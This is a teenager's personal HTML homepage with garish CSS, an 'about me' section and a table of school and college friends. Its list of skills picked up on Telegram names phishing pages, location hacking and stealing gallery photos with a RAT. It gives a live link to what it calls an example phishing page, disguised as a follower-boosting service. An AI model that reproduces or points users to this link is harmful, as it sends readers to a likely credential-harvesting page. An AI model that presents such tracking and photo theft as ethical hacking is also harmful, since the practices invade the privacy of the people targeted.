<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>yuvi</title> <style>
        h1{ border: 10px solid rgb(10, 185, 22);
        background-color: rgb(24, 11, 207);
        color: red;}
        a:link, a:visited{
            background-color: aqua;
            color: black;
            border: 3px solid red;
            padding: 10px 20px;
            text-align: center;
            text-decoration: none;
            display: inline-block;
            margin: 10px;
        }
        a:hover, a:active{
            background-color: blue;
            color: white;
            text-shadow: 15px 15px 15px yellow;
        }
        
        ol{ background-color: aqua;
        padding: 20px;}
        ol li {
            background: #ffe5e5;
            color: darkred;
            padding: 5px;
            margin-left: 35px;
          }
          ol li:hover{ background-color: rgb(255, 0, 13);}
          .fa-facebook-messenger{
            font-size: 50px;
            color: rgb(255, 0, 195);
          }
         
        
        
        body {
            margin: 0;
            height: 100vh;
            overflow: hidden;
            background: linear-gradient(135deg, #ff0047, #2b2dff);
            animation: lightEffect 5s infinite alternate;
        }
        
        @keyframes lightEffect {
            0% {
                background: linear-gradient(135deg, #00ff2a, #2b2dff);
            }
            50% {
                background: linear-gradient(135deg, #ff7e00, #00ff7e);
            }
            100% {
                background: linear-gradient(135deg, #ff0047, #2b2dff);
            }
        }
        
        h2{    background-color: aqua;
            color: black;
            border: 3px solid red;
            padding: 10px 20px;
            text-align: center;
            text-decoration: none;
            display: inline-block;
            margin: 10px;
            
        }

        
        h3{  background-color: rgb(255, 238, 0);
            color: black;
            border: 5px dashed rgb(0, 0, 255);
            padding: 10px 20px;
            text-align: center;
            text-decoration: none;
            display: inline-block;
            margin: 10px;
            
        }
        table{ border-collapse: collapse; margin-left:15px; margin-top: 30PX;
            width: 100%; color:rgb(255, 17, 0) ;}
            table, td, th { text-align: justify;
                border:6px solid rgb(60, 198, 14) ;
            }
        html{
            overflow: visible;
        }</style>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.6.0/css/all.min.css" integrity="sha512-Kc323vGBEqzTmouAECnVceyQqyqdsSiqLQISBL29aUW4U/M7pSPA/gEUZQqv1cwx4OnYxTxve5UMg5GT6L4JJg==" crossorigin="anonymous" referrerpolicy="no-referrer" />
</head>
<body>
    <h1><marquee> <I>WELCOME TO YUVRAJ SINGH WEBPAGE </i></marquee></h1><center>
         <h2>  ABOUT ME 👉</h2>
     <p>
          <h3><i style="color: #ff0047;">HELLO EVERYONE I AM YUVRAJ SINGH. I AM 17 YEARS OLD. I am pursuing BCA. MY dream is to be a ethical hacker. THATS  why i use telegram to learn some basic of hacking. </i></h3>
     </center>
     <h2 style="border: 5px dashed black; background-color: rgb(10, 185, 22) ;"> what i get from telegram--</h2><ol>
                <li>use of fishing pages like ---<a href="https://toolsxsocial.in/get-follower/76b3dhXbd7" target="_blank"> click here </a></li>
                <li>location hack</li>
                <li>GALLLARY PHOTO HACK BY RAT</li>
                <LI>I LEARNT THESE METHODS FROM TELEGRAM SO I AM VERY THANKFUL TO MY friends --  CROWNY, KEVIN,PRIYANSHU</LI>
                

              </ol>

              
    
    <h2 style="color: brown;border: 5px double yellow; background-color: black;">HERE ARE MY SOME BEST SCHOOL OR COLLEGE  FRIENDS NAME  </h2>

    
    <table border="4">
        <tr><th> NAME</th>
        <th>  INFORMATION OR QUALITY</th></tr>
        <TR> <TD>HEMANT </TD><TD>he always help me so he is my best friend </TD></TR>
   <tr><td>ANUJ</td><TD> he is my neighbour, and also help me in some critical situations </TD></tr>
    <tr><td>LALIT </td><td>my school friend,also help me and save me from many big matters  </td></tr>
       <tr><td>PRIYANSHU</td><TD>my college friend ,  the first student who use kali linux in just class 10th </TD></tr>   
 <tr><td>SATYANARAYAN,LUCKY,RAJNEESH,NARESH<TD>my school friends</TD> </td></tr>
 <tr><td>SHAILENDRA</td><td>he always gives me advice </td></tr>
 <tr><td>VIVEK,PRASHANT,VISHAL,HIMANSHU,AVDESH</td><TD>FRIENDS WHO HELPS ME IN STUDY </TD></tr>
 <TR><TD> AND YOU ALSO I MEAN WHO IS SEEING MY webpage  </td> <td> you are also my best friend </td></TR>
 </table>
 <p> <center>
       <a href="https://www.instagram.com/yuvraj_singh_00_3?igsh=MTR6c3hubHc5dzg0MQ==">CONTACT ME </a></center></p>


            </body>
</html>